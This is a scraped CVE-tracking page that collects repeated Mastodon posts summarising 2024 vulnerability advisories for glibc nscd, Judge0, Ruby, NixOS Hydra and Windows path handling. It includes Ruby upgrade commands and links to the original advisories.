- CVE-2024-33600: sourceware.org/bugzilla/show_b
- CVE-2024-33601: sourceware.org/bugzilla/show_b
- CVE-2024-33602: sourceware.org/bugzilla/show_b

lists.debian.org/debian-securi #vulnerability #infosec #cybersecurity #CVE202433599 #CVE202433600 #CVE202433601 #CVE202433602

##

screaminggoat at 2024-05-03T21:05:38.460Z ##

@harrysintonen they really should have explicitly written out each vulnerability's description. None of them are live on cve.org (and NVD by extension.)

Unrelated but I've taken to writing out the CVEs like because it's easier to read and I make less mistakes.

##

screaminggoat@infosec.exchange at 2024-05-03T21:05:38.000Z ##

@harrysintonen they really should have explicitly written out each vulnerability's description. None of them are live on cve.org (and NVD by extension.)

Unrelated but I've taken to writing out the CVEs like #CVE_2024_33599 #CVE_2024_33600 #CVE_2024_33601 #CVE_2024_33602 because it's easier to read and I make less mistakes.

##

harrysintonen at 2024-05-03T20:58:16.924Z ##

Several vulnerabilities have been discovered in , the Name Service Cache Daemon in the which may lead to denial of service or the execution of arbitrary code.

The vulnerability details:
- CVE-2024-33599: sourceware.org/bugzilla/show_b
- CVE-2024-33600: sourceware.org/bugzilla/show_b
- CVE-2024-33601: sourceware.org/bugzilla/show_b
- CVE-2024-33602: sourceware.org/bugzilla/show_b

lists.debian.org/debian-securi

##

harrysintonen@infosec.exchange at 2024-05-03T20:58:16.000Z ##

Several vulnerabilities have been discovered in #nscd, the Name Service Cache Daemon in the #glibc which may lead to denial of service or the execution of arbitrary code.

The vulnerability details:
- CVE-2024-33599: sourceware.org/bugzilla/show_b
- CVE-2024-33600: sourceware.org/bugzilla/show_b
- CVE-2024-33601: sourceware.org/bugzilla/show_b
- CVE-2024-33602: sourceware.org/bugzilla/show_b

lists.debian.org/debian-securi #vulnerability #infosec #cybersecurity #CVE202433599 #CVE202433600 #CVE202433601 #CVE202433602

##

screaminggoat at 2024-05-03T21:05:38.460Z ##

@harrysintonen they really should have explicitly written out each vulnerability's description. None of them are live on cve.org (and NVD by extension.)

Unrelated but I've taken to writing out the CVEs like because it's easier to read and I make less mistakes.

##

screaminggoat@infosec.exchange at 2024-05-03T21:05:38.000Z ##

@harrysintonen they really should have explicitly written out each vulnerability's description. None of them are live on cve.org (and NVD by extension.)

Unrelated but I've taken to writing out the CVEs like #CVE_2024_33599 #CVE_2024_33600 #CVE_2024_33601 #CVE_2024_33602 because it's easier to read and I make less mistakes.

##

CVE-2024-28185
(0 None)

EPSS: 0.04%

4 posts

N/A

screaminggoat at 2024-04-29T13:52:07.868Z ##

Tanto Security: Judge0 Sandbox Escape
Judge0 is an open source service used to run arbitrary code inside a secure sandbox. Tanto Security disclosed vulnerabilities (including proofs of concept and exploit scripts) in Judge0 that allows an adversary with sufficient access to perform a sandbox escape and obtain root permissions on the host machine. h/t @buherator

  • CVE-2024-29021 (9.0 critical) Server Side Request Forgery (SSRF) leads to sandbox escape, an attacker with sufficient access to the Judge0 API obtains unsandboxed code execution as root on the target machine.
  • CVE-2024-28185 (10.0 critical) Symlinks placed inside the sandbox directory can be leveraged by an attacker to write to arbitrary files and gain code execution outside of the sandbox.
  • CVE-2024-28189 (10.0 critical) Symlink to a file outside the sandbox allows an attacker to run chown on arbitrary files outside of the sandbox. Considered CVE-2024-28185 patch bypass.

##

screaminggoat@infosec.exchange at 2024-04-29T13:52:07.000Z ##

Tanto Security: Judge0 Sandbox Escape
Judge0 is an open source service used to run arbitrary code inside a secure sandbox. Tanto Security disclosed vulnerabilities (including proofs of concept and exploit scripts) in Judge0 that allows an adversary with sufficient access to perform a sandbox escape and obtain root permissions on the host machine. h/t @buherator

  • CVE-2024-29021 (9.0 critical) Server Side Request Forgery (SSRF) leads to sandbox escape, an attacker with sufficient access to the Judge0 API obtains unsandboxed code execution as root on the target machine.
  • CVE-2024-28185 (10.0 critical) Symlinks placed inside the sandbox directory can be leveraged by an attacker to write to arbitrary files and gain code execution outside of the sandbox.
  • CVE-2024-28189 (10.0 critical) Symlink to a file outside the sandbox allows an attacker to run chown on arbitrary files outside of the sandbox. Considered CVE-2024-28185 patch bypass.

#CVE_2024_29021 #CVE_2024_28185 #CVE_2024_28189 #CVE_2024_28185 #Judge0 #proofofconcept #vulnerability

##

jbhall56 at 2024-05-01T12:15:33.264Z ##

The company documented the flaws in an advisory that warns that Judge0 versions prior to 1.13.1 are impacted by CVE-2024-28185, CVE-2024-28189, and CVE-2024-29021. securityweek.com/critical-vuln

##

jbhall56@infosec.exchange at 2024-05-01T12:15:33.000Z ##

The company documented the flaws in an advisory that warns that Judge0 versions prior to 1.13.1 are impacted by CVE-2024-28185, CVE-2024-28189, and CVE-2024-29021. securityweek.com/critical-vuln

##

pentesttools at 2024-04-30T11:33:10.581Z ##

Hi there! You look like someone who appreciates the finer things in . 🥨 Snack on these fresh updates which include:

💥 New findings for publicly exposed VNC, MSSQL & LDAP services + comprehensive DNS records
👀 Detectors for CVE-2023-3824 (CVSSv3 9.8) & CVE-2023-44487 (CVSSv3 7.5)
🎯 Exploits for CVE-2024-0204 (CVSSv3 9.8) & CVE-2024-1212 (CVSSv3 10)
🥊 Detection for flaws in JWT implementations which lead to authentication security risks
🕷️ Extra information about spidered responses in Website Scanner evidence
🔥 Proof of exploitation for Linux OS command injection from the Website Scanner

and MORE!

Check out the video: youtu.be/-CZJhZvErsI?si=l-TOzC

Or the change log: pentest-tools.com/change-log

##

pentesttools@infosec.exchange at 2024-04-30T11:33:10.000Z ##

Hi there! You look like someone who appreciates the finer things in #ethicalhacking. 🥨 Snack on these fresh updates which include:

💥 New findings for publicly exposed VNC, MSSQL & LDAP services + comprehensive DNS records
👀 Detectors for CVE-2023-3824 (CVSSv3 9.8) & CVE-2023-44487 (CVSSv3 7.5)
🎯 Exploits for CVE-2024-0204 (CVSSv3 9.8) & CVE-2024-1212 (CVSSv3 10)
🥊 Detection for flaws in JWT implementations which lead to authentication security risks
🕷️ Extra information about spidered responses in Website Scanner evidence
🔥 Proof of exploitation for Linux OS command injection from the Website Scanner

and MORE!

Check out the video: youtu.be/-CZJhZvErsI?si=l-TOzC

Or the change log: pentest-tools.com/change-log

##

CVE-2024-202353
(0 None)

EPSS: 0.00%

2 posts

N/A

CVE-2024-202359
(0 None)

EPSS: 0.00%

2 posts

N/A

CVE-2024-27282
(0 None)

EPSS: 0.00%

3 posts

N/A

postmodern@ruby.social at 2024-04-24T00:43:27.000Z ##

Thank you to @havenwood for updating the ruby-versions repo for CVE-2024-27282! ruby-install users, please upgrade your ruby versions!

ruby-install --update
ruby-install ruby-3.0.7
ruby-install ruby-3.1.5
ruby-install ruby-3.2.4
ruby-install ruby-3.3.1

ruby-lang.org/en/news/2024/04/
#ruby #rubysec #cve #cve_2024_2782 #cve20242782

##

zundan@mastodon.zunda.ninja at 2024-04-25T01:45:20.000Z ##

> スクリプト言語「Ruby」の開発チームは4月23日、「Ruby」の正規表現(Regex)検索に任意のメモリアドレスを読み取られる脆弱性(CVE-2024-27282)があることを明らかにした。修正版がリリースされている。

「Ruby 3」系統の正規表現コンパイラーに情報漏えいの脆弱性、修正版がリリース
v3.0.7、v3.1.5、v3.2.4、v3.3.1への更新を
https://forest.watch.impress.co.jp/docs/news/1586881.html

##

postmodern@ruby.social at 2024-04-24T00:43:27.000Z ##

Thank you to @havenwood for updating the ruby-versions repo for CVE-2024-27282! ruby-install users, please upgrade your ruby versions!

ruby-install --update
ruby-install ruby-3.0.7
ruby-install ruby-3.1.5
ruby-install ruby-3.2.4
ruby-install ruby-3.3.1

ruby-lang.org/en/news/2024/04/
#ruby #rubysec #cve #cve_2024_2782 #cve20242782

##

CVE-2024-32657
(0 None)

EPSS: 0.04%

2 posts

N/A

delroth@delroth.net at 2024-04-22T18:42:14.000Z ##

Discovered and (tentatively) fixed CVE-2024-32657 yesterday - somehow I think this might be my first CVE finder credit ever.

github.com/NixOS/hydra/securit

Very obvious hole, but hey, either nobody saw the exploitability or nobody cared to fix it before...

##

delroth@delroth.net at 2024-04-22T18:42:14.000Z ##

Discovered and (tentatively) fixed CVE-2024-32657 yesterday - somehow I think this might be my first CVE finder credit ever.

github.com/NixOS/hydra/securit

Very obvious hole, but hey, either nobody saw the exploitability or nobody cared to fix it before...

##

CVE-2023-42757
(0 None)

EPSS: 0.00%

2 posts

N/A

screaminggoat at 2024-04-22T13:54:40.550Z ##

SafeBreach revealed that the DOS-to-NT path conversion process could be exploited by threat actors to achieve rootkit-like capabilities to conceal and impersonate files, directories, and processes. "During this conversion process, a known issue exists in which the function removes trailing dots (referring to this as "MagicDot") from any path element and any trailing spaces from the last path element. This action is completed by most user-space APIs in Windows." This resulted in multiple CVEs: CVE-2023-36396 (7.8 high, RCE), CVE-2023-32054 (7.3 high, EoP write), and CVE-2023-42757 (unpublished DoS). Microsoft declined to fix an Elevation of Privilege delete vulnerability. 🔗 safebreach.com/blog/magicdot-a

##

simontsui@infosec.exchange at 2024-04-22T13:54:40.000Z ##

SafeBreach revealed that the DOS-to-NT path conversion process could be exploited by threat actors to achieve rootkit-like capabilities to conceal and impersonate files, directories, and processes. "During this conversion process, a known issue exists in which the function removes trailing dots (referring to this as "MagicDot") from any path element and any trailing spaces from the last path element. This action is completed by most user-space APIs in Windows." This resulted in multiple CVEs: CVE-2023-36396 (7.8 high, RCE), CVE-2023-32054 (7.3 high, EoP write), and CVE-2023-42757 (unpublished DoS). Microsoft declined to fix an Elevation of Privilege delete vulnerability. 🔗 safebreach.com/blog/magicdot-a

#MagicDot #CVE_2023_42757 #CVE_2023_32054 #CVE_2023_36396

##

Visit counter For Websites